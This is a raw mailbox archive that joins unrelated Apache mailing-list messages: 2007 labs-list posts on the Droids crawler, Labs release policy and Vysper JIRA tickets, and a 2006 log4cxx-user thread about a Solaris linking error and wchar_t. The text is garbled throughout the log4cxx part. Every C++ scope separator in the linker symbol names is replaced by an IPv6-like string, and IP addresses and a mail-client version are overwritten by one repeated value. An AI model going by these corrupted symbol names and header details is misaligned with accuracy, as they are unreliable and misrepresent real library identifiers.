2007 18:47:34 +0100 (MET) (envelope-from: <[email protected]>) Subject: Re: [droids] current status? From: Thorsten Scherler <[email protected]> To: [email protected] In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain Date: Sun, 16 Dec 2007 18:46:52 +0100 Message-Id: <1197827212.7817.6.camel@cartman> Mime-Version: 1.0 X-Mailer: Evolution 2.10.1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org On Sat, 2007-12-15 at 12:00 -0500, Ryan McKinley wrote: > Hello- > > I'm looking for a simple crawler to integrate with solr. Droids seems > good, but I'm not sure where to start working. /trunk is empty, and I > don't see posts since Feb. Yeah I wrapped up a first version of droids and will start work on trunk again end of this year. I will replace the nutch infrastructure code with spring to make droids simpler and more standard like. Otis as well wrote me the other day asking about droids and I can repeat what I told him: any help is welcome. http://labs.markmail.org/message/uth73pmi7q2dwo3j?q=Norbert " Regarding [2] it is very interesting indeed for droids to become part of HttpComponents. I want to rewrite the code to use spring instead of the underlying slimed down version of nutch plugins infrastructure code to make it more standard and understandable. After this rewrite I gladly see droids incubating with HttpComponents as sponsor project." > Any pointers? > > just use: > http://svn.apache.org/repos/asf/labs/droids/branch/nutch/ > ? > Yeah for now since I expect the plugins infrastructure to be quite stable. I will be away for a week but after this week I will fill the trunk again with the refactored code. Thanks everybody to express interest in droids. salu2 > thanks > ryan > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > -- Thorsten Scherler thorsten.at.apache.org Open Source Java consulting, training and solutions --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Dec 20 09:07:09 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96947 invoked from network); 20 Dec 2007 09:07:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Dec 2007 09:07:08 -0000 Received: (qmail 98780 invoked by uid 500); 20 Dec 2007 09:06:56 -0000 Delivered-To: [email protected] Received: (qmail 98620 invoked by uid 500); 20 Dec 2007 09:06:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 82906 invoked by uid 99); 19 Dec 2007 21:42:48 -0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Message-ID: <[email protected]> Date: Wed, 19 Dec 2007 15:42:26 -0600 From: "William A. Rowe, Jr." <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20071115) MIME-Version: 1.0 To: [email protected] CC: [email protected] Subject: Re: [report] Apache Labs References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Roy T. Fielding wrote: > On Dec 12, 2007, at 11:34 AM, Stefano Mazzocchi wrote: > >> I feel the need to outline, though, that the "no release" rule for labs >> was created to avoid people from using labs as a way to route around the >> incubator, yet 'code-less' labs are able, in fact, to 'release' their >> own documentation artifacts, without oversight or the need for a >> community around the effort. >> >> Let me repeat: I think that Webarch and code-less labs are a *good >> thing* and should be encouraged in any way possible, as long as the >> product of their effort is clearly marked as coming from a lab (which is >> the case for Webarch) and not used as a way to abuse the apache branding >> to give resonance to an individual committer's effort. That's a good point. And I think it's sometimes lost. The labs should not be an obstacle for /a participant/ to publish /their/ work. Not as an "ASF release", obviously, but as their own work. Not necessarily through the ASF at all, although people.apache.org/~me/ should be is clearly enough that person's work, perhaps with additional disclaimers as you hint. This should be refined and tweaked. Certainly, publishing externally shouldn't be a problem. CLA grants the ASF a license. It doesn't strip the author of their copyright. In fact, when we talk about licensing, if Sam wants to go and license their work under the GPL as well as the AL, there's really nothing that prevents that (nor should there be). How a labs project starts doesn't have to reflect its final disposition by the author? >> I'm just mentioning this so that both labs@ and board@ consider this >> food for thought and in no way I want such food for thought endanger the >> ability to use labs in the way Roy has done... but it's my duty, as PMC >> chair, to report changes in the project evolution that might require, in >> the future, board attention that this is the closest thing to that (even >> if, right now, does not require any action from any part and it's >> unlikely that it will require any in the future either). > > However, I should also note that the IETF httpbis WG (or at least the > chairs in consultation with the ADs) have decided that apache.org > is not a sufficiently "neutral" player to host such work in the future, > so my partitioned drafts, issues, and related stuff are presently > being moved to tools.ietf.org. The webarch http lab has served its > purpose, but is about to be closed (essentially graduating to a spec > project on some SDO's infrastructure). This was very interesting, can you clarify what aspects of the ASF were determined to be not-"neutral"? The fact that the ASF implements specs? I could understand that perspective. Was it the patent clause of the license? Or was it something more that the board should be concerned about? > As for the rest of webarch, I've pretty much concluded that it is > pointless to host a project on infrastructure that doesn't allow > the creation of project-specific mailing lists. Labs is a nice idea > but is overly constrained. For example, consider the website issue. > Is it really okay for me to just publish stuff like > > http://labs.apache.org/webarch/http/draft-fielding-http/ > > without it being considered a "release"? I honestly don't know. > I mean, I know it is safe for me to do so given the nature of > the content, but that may not be true for other labs, or even for > webarch if I put the waka spec up on the site (the original plan). One nice caviat there, you named it 'draft-'. Consider if it became a final document, are you prevented from publishing it there, but allowed to have published it throughout the draft process? Interesting tangle. > And what happens to that content when the lab is closed? The two > main reasons for having it at Apache are so that others can > work on it (e.g., Julian) and so that the version history is > permanently available (for legal and historical reasons). I think > that may have stretched the labs idea too far. Collaboration with non-committers is a huge hassle, I'd agree. And when it outgrows one or two authors into many, labs probably isn't the place for it. > In order for me to do webarch at Apache, I need a TLP with its own > mailing lists, a stable location for subversion/jira/website URIs, > and the ability to release "products" with licenses that are more > lenient than the Apache License. I don't see a way of getting > there from here. Creating my own SDO would be easier. I find this especially interesting, given your involvement in very carefully crafting the AL 2.0. What you author, of course you may relicense differently externally to the ASF, and the labs concept is really ideal for this (limited authors, easier licensing). Ignoring the infrastructure issues; what can the ASF provide in terms of a more lenient license, without exposing end users to more significant risks? Feel free to fork these diverse thoughts into board or labs threads as you will. Bill --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Dec 21 08:59:06 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44238 invoked from network); 21 Dec 2007 08:59:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Dec 2007 08:59:05 -0000 Received: (qmail 84772 invoked by uid 500); 21 Dec 2007 08:58:54 -0000 Delivered-To: [email protected] Received: (qmail 84585 invoked by uid 500); 21 Dec 2007 08:58:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84512 invoked by uid 99); 21 Dec 2007 08:58:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Dec 2007 00:58:53 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Dec 2007 08:58:39 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 37D1E714240 for <[email protected]>; Fri, 21 Dec 2007 00:58:43 -0800 (PST) Message-ID: <29194644.1198227523224.JavaMail.jira@brutus> Date: Fri, 21 Dec 2007 00:58:43 -0800 (PST) From: "Bernd Fondermann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (LABS-111) Create registry for bound resources MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Create registry for bound resources ----------------------------------- Key: LABS-111 URL: https://issues.apache.org/jira/browse/LABS-111 Project: Labs Issue Type: Sub-task Components: Vysper Reporter: Bernd Fondermann -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Dec 21 09:01:15 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45023 invoked from network); 21 Dec 2007 09:01:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Dec 2007 09:01:14 -0000 Received: (qmail 85974 invoked by uid 500); 21 Dec 2007 09:01:03 -0000 Delivered-To: [email protected] Received: (qmail 85750 invoked by uid 500); 21 Dec 2007 09:01:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 85741 invoked by uid 99); 21 Dec 2007 09:01:03 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Dec 2007 01:01:03 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Dec 2007 09:00:59 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B799D714236 for <[email protected]>; Fri, 21 Dec 2007 01:00:49 -0800 (PST) Message-ID: <1923640.1198227649749.JavaMail.jira@brutus> Date: Fri, 21 Dec 2007 01:00:49 -0800 (PST) From: "Bernd Fondermann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (LABS-112) Handle resource binding handshake MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Handle resource binding handshake --------------------------------- Key: LABS-112 URL: https://issues.apache.org/jira/browse/LABS-112 Project: Labs Issue Type: Sub-task Components: Vysper Reporter: Bernd Fondermann -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Dec 21 09:01:19 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45325 invoked from network); 21 Dec 2007 09:01:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Dec 2007 09:01:18 -0000 Received: (qmail 86158 invoked by uid 500); 21 Dec 2007 09:01:07 -0000 Delivered-To: [email protected] Received: (qmail 86034 invoked by uid 500); 21 Dec 2007 09:01:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86025 invoked by uid 99); 21 Dec 2007 09:01:07 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Dec 2007 01:01:07 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Dec 2007 09:01:03 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E3EB7714240 for <[email protected]>; Fri, 21 Dec 2007 01:00:54 -0800 (PST) Message-ID: <27993087.1198227654931.JavaMail.jira@brutus> Date: Fri, 21 Dec 2007 01:00:54 -0800 (PST) From: "Bernd Fondermann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (LABS-113) Handle resource unbinding MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Handle resource unbinding ------------------------- Key: LABS-113 URL: https://issues.apache.org/jira/browse/LABS-113 Project: Labs Issue Type: Sub-task Reporter: Bernd Fondermann -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Wed Sep 06 09:51:19 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42524 invoked from network); 6 Sep 2006 09:51:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Sep 2006 09:51:18 -0000 Received: (qmail 81829 invoked by uid 500); 6 Sep 2006 09:51:13 -0000 Delivered-To: [email protected] Received: (qmail 81737 invoked by uid 500); 6 Sep 2006 09:51:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 81708 invoked by uid 99); 6 Sep 2006 09:51:12 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 06 Sep 2006 02:51:12 -0700 X-ASF-Spam-Status: No, hits=0.3 required=10.0 tests=HTML_FONT_BIG,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO qvgsmtp2.airfrance.fr) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 06 Sep 2006 02:51:08 -0700 Received: from unknown (HELO xln22qvgsmtpo.france.airfrance.fr) ([161.129.204.104]) by qvgsmtp2.airfrance.fr with ESMTP; 06 Sep 2006 11:50:51 +0200 To: [email protected] Subject: linking error whith 0.9.8 release MIME-Version: 1.0 X-Mailer: Lotus Notes Release 6.5.1 January 21, 2004 Message-ID: <[email protected]> From: Nicolas Bastien <[email protected]> Date: Wed, 6 Sep 2006 11:50:39 +0200 X-MIMETrack: MIME-CD by Router on SLM3QVI/QVI/GRAF/FR(652FP1HF37|March 08, 2005) at 06/09/2006 11:50:43, MIME-CD complete at 06/09/2006 11:50:43, Serialize by Router on SLN2SMTPOUT/INFO/QVG/GRAF/FR(Release 6.5.4FP1|June 19, 2005) at 09/06/2006 11:50:44 AM Content-type: multipart/alternative; Boundary="0__=4EBBFB72DFA684E28f9e8a93df938690918c4EBBFB72DFA684E2" Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0__=4EBBFB72DFA684E28f9e8a93df938690918c4EBBFB72DFA684E2 Content-type: text/plain; charset=ISO-8859-1 Content-transfer-encoding: quoted-printable Hi , i'm trying to compile the 0.9.8 version updated by svn, =A0with gcc ver= sion 4.1.1on sparc-sun-solaris2.8 ( with apr , =A0apr-utils, enable-unicode and =A0without cppunit) I've got a linking error =A0: ld: warning: file /app/DINB/local/lib/libstdc++.so: attempted multiple inclusion of file Undefined =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 first referenced =A0symbol =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 in fi= le log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bncodeWide(unsigned int, wchar_t*)../src/.libs/liblog4cxx.so log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bodeWide(wchar_t const*&, wchar_t const*)../src/.libs/liblog4cxx.so log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blengthUTF8(wchar_t)../src/.libs/liblog= 4cxx.so ld: fatal: Symbol referencing errors. No output written to .libs/simplesocketserver collect2: ld returned 1 exit status make[1]: *** [simplesocketserver] Error 1 make: *** [all-recursive] Error 1 ln: cannot create liblog4cxx.so.9: File exists ln: cannot create liblog4cxx.so: File exists ld: warning: file /app/DINB/local/lib/libstdc++.so: attempted multiple inclusion of file Undefined =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 first referenced =A0symbol =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 in fi= le log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bncodeWide(unsigned int, wchar_t*)../src/.libs/liblog4cxx.so log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bodeWide(wchar_t const*&, wchar_t const*)../src/.libs/liblog4cxx.so log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blengthUTF8(wchar_t)../src/.libs/liblog= 4cxx.so ld: fatal: Symbol referencing errors. No output written to .libs/simplesocketserver collect2: ld returned 1 exit status make[1]: *** [simplesocketserver] Error 1 make: *** [install-recursive] Error 1 Can you tell me when the 0.9.8 =A0is going to be released . Thank you for your help Nicolas BASTIEN ---------------- L'acces immediat aux meilleurs tarifs Air France et au billet electroni= que sur http://www.airfrance.com For immediate access to the best Air France fares and to electronic tickets, visit our website http://www.airfrance.com ---------------- Les donnees et renseignements contenus dans ce message sont personnels,= confidentiels et secrets. Ce message est adresse a l'individu ou l'enti= te dont les coordonnees figurent ci-dessus. Si vous n'etes pas le bon destinataire, nous vous demandons de ne pas lire, copier, utiliser ou divulguer cette communication. Nous vous prions de notifier cette erreu= r a l'expediteur et d'effacer immediatement cette communication de votre systeme. The information contained in this message is privileged, confidential, = and protected from disclosure. This message is intended for the individual = or entity adressed herein. If you are not the intended recipient, please d= o not read, copy, use or disclose this communication to others; also plea= se notify the sender by replying to this message, and then delete it from = your system.= --0__=4EBBFB72DFA684E28f9e8a93df938690918c4EBBFB72DFA684E2 Content-type: text/html; charset=ISO-8859-1 Content-Disposition: inline Content-transfer-encoding: quoted-printable <html><body> <p>Hi , <font size=3D"4"> </font><br> <br> i'm trying to compile the <font size=3D"4">0.9.8 version updated by svn= , =A0with gcc version 4.1.1on sparc-sun-solaris2.8 ( with apr , =A0apr-= utils, enable-unicode and =A0without cppunit) </font><font size=3D"4"> = </font><br> <br> I've got a linking error =A0: <font size=3D"4"> </font><br> <br> <br> ld: warning: file /app/DINB/local/lib/libstdc++.so: attempted multiple = inclusion of file<br> Undefined =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 first referenced<= font size=3D"4"> </font><br> =A0symbol =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 in fi= le<font size=3D"4"> </font><br> log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bncodeWide(unsigned int, wchar_t*)../s= rc/.libs/liblog4cxx.so<font size=3D"4"> </font><br> log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bodeWide(wchar_t const*&amp;, wchar_= t const*)../src/.libs/liblog4cxx.so<font size=3D"4"> </font><br> log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blengthUTF8(wchar_t)../src/.libs/liblog= 4cxx.so<font size=3D"4"> </font><br> ld: fatal: Symbol referencing errors. No output written to .libs/simple= socketserver<font size=3D"4"> </font><br> collect2: ld returned 1 exit status<font size=3D"4"> </font><br> make[1]: *** [simplesocketserver] Error 1<font size=3D"4"> </font><br> make: *** [all-recursive] Error 1<font size=3D"4"> </font><br> ln: cannot create liblog4cxx.so.9: File exists<br> ln: cannot create liblog4cxx.so: File exists<font size=3D"4"> </font><b= r> ld: warning: file /app/DINB/local/lib/libstdc++.so: attempted multiple = inclusion of file<font size=3D"4"> </font><br> Undefined =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 first referenced<= font size=3D"4"> </font><br> =A0symbol =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 in fi= le<font size=3D"4"> </font><br> log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bncodeWide(unsigned int, wchar_t*)../s= rc/.libs/liblog4cxx.so<font size=3D"4"> </font><br> log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bodeWide(wchar_t const*&amp;, wchar_= t const*)../src/.libs/liblog4cxx.so<font size=3D"4"> </font><br> log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blengthUTF8(wchar_t)../src/.libs/liblog= 4cxx.so<font size=3D"4"> </font><br> ld: fatal: Symbol referencing errors. No output written to .libs/simple= socketserver<font size=3D"4"> </font><br> collect2: ld returned 1 exit status<font size=3D"4"> </font><br> make[1]: *** [simplesocketserver] Error 1<font size=3D"4"> </font><br> make: *** [install-recursive] Error 1<br> <br> <br> Can you tell me when the 0.9.8 =A0<font size=3D"4">is going to be relea= sed </font>. <font size=3D"4"> </font><br> Thank you for your help =A0<font size=3D"4"> </font><br> <br> Nicolas BASTIEN<br> <font size=3D"4"> </font><br> ----------------<br> L'acces immediat aux meilleurs tarifs Air France et au billet electroni= que sur <a href=3D"http://www.airfrance.com">http://www.airfrance.com</= a><br> For immediate access to the best Air France fares and to electronic tic= kets, visit our website <a href=3D"http://www.airfrance.com">http://www= .airfrance.com</a><br> <br> ----------------<br> Les donnees et renseignements contenus dans ce message sont personnels,= confidentiels et secrets. Ce message est adresse a l'individu ou l'ent= ite dont les coordonnees figurent ci-dessus. Si vous n'etes pas le bon = destinataire, nous vous demandons de ne pas lire, copier, utiliser ou d= ivulguer cette communication. Nous vous prions de notifier cette erreur= a l'expediteur et d'effacer immediatement cette communication de votre= systeme.<br> The information contained in this message is privileged, confidential, = and protected from disclosure. This message is intended for the individ= ual or entity adressed herein. If you are not the intended recipient, p= lease do not read, copy, use or disclose this communication to others; = also please notify the sender by replying to this message, and then del= ete it from your system.</body></html>= --0__=4EBBFB72DFA684E28f9e8a93df938690918c4EBBFB72DFA684E2-- From [email protected] Thu Sep 07 05:37:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11673 invoked from network); 7 Sep 2006 05:37:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Sep 2006 05:37:54 -0000 Received: (qmail 49548 invoked by uid 500); 7 Sep 2006 05:37:53 -0000 Delivered-To: [email protected] Received: (qmail 49530 invoked by uid 500); 7 Sep 2006 05:37:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 49519 invoked by uid 99); 7 Sep 2006 05:37:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 06 Sep 2006 22:37:53 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO smtp103.sbc.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 06 Sep 2006 22:37:50 -0700 Received: (qmail 26608 invoked from network); 7 Sep 2006 05:37:29 -0000 Received: from unknown (HELO ?161.129.204.104?) ([email protected]@161.129.204.104 with plain) by smtp103.sbc.mail.mud.yahoo.com with SMTP; 7 Sep 2006 05:37:28 -0000 Mime-Version: 1.0 (Apple Message framework v752.2) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Curt Arnold <[email protected]> Subject: Re: linking error whith 0.9.8 release Date: Thu, 7 Sep 2006 00:37:21 -0500 To: Log4CXX User <[email protected]> X-Mailer: Apple Mail (2.752.2) X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On Sep 6, 2006, at 4:50 AM, Nicolas Bastien wrote: > Hi , > > i'm trying to compile the 0.9.8 version updated by svn, with gcc > version 4.1.1on sparc-sun-solaris2.8 ( with apr , apr-utils, > enable-unicode and without cppunit) > > I've got a linking error : > > > ld: warning: file /app/DINB/local/lib/libstdc++.so: attempted > multiple inclusion of file > Undefined first referenced > symbol in file > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bncodeWide(unsigned int, > wchar_t*)../src/.libs/liblog4cxx.so > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bodeWide(wchar_t const*&, > wchar_t const*)../src/.libs/liblog4cxx.so > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blengthUTF8(wchar_t)../src/.libs/ > liblog4cxx.so > ld: fatal: Symbol referencing errors. No output written to .libs/ > simplesocketserver > collect2: ld returned 1 exit status > make[1]: *** [simplesocketserver] Error 1 > make: *** [all-recursive] Error 1 > ln: cannot create liblog4cxx.so.9: File exists > ln: cannot create liblog4cxx.so: File exists > ld: warning: file /app/DINB/local/lib/libstdc++.so: attempted > multiple inclusion of file > Undefined first referenced > symbol in file > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bncodeWide(unsigned int, > wchar_t*)../src/.libs/liblog4cxx.so > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bodeWide(wchar_t const*&, > wchar_t const*)../src/.libs/liblog4cxx.so > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blengthUTF8(wchar_t)../src/.libs/ > liblog4cxx.so > ld: fatal: Symbol referencing errors. No output written to .libs/ > simplesocketserver > collect2: ld returned 1 exit status > make[1]: *** [simplesocketserver] Error 1 > make: *** [install-recursive] Error 1 > These specific unresolved references are the indicator that nature of wchar_t on a platform could not be determined which is known to occur on Solaris and Mac OS/X. On Solaris, wchar_t can be either UCS-4 (most Solaris versions) or something else (on Traditional Chinese or Korean versions of Solaris). Since the target character set is not known at compile time, the compiler does not set __STD_ISO_10646__ which would indicate that wchar_t is UCS-4. The solution is to either suppress wchar_t support or to specify __STD_ISO_10646__ and limit your distribution to Solaris versions other than Traditional Chinese or Korean. I believe the enable-unicode flag in the autotools build is misnamed, I believe it is the equivalent of has.wchar_t on the Ant build and indicates whether the wchar_t character type is supported. Regardless of the state of those flags, internal processing in log4cxx is always Unicode, but whether UTF-8 char's or wchar_t's are used depends on the settings and platform. Previously discussed in http://marc.theaimsgroup.com/?l=log4cxx- user&m=114313201623098&w=2 > Can you tell me when the 0.9.8 is going to be released . > Thank you for your help > Any releases require a vote by the log4cxx committers and the logging 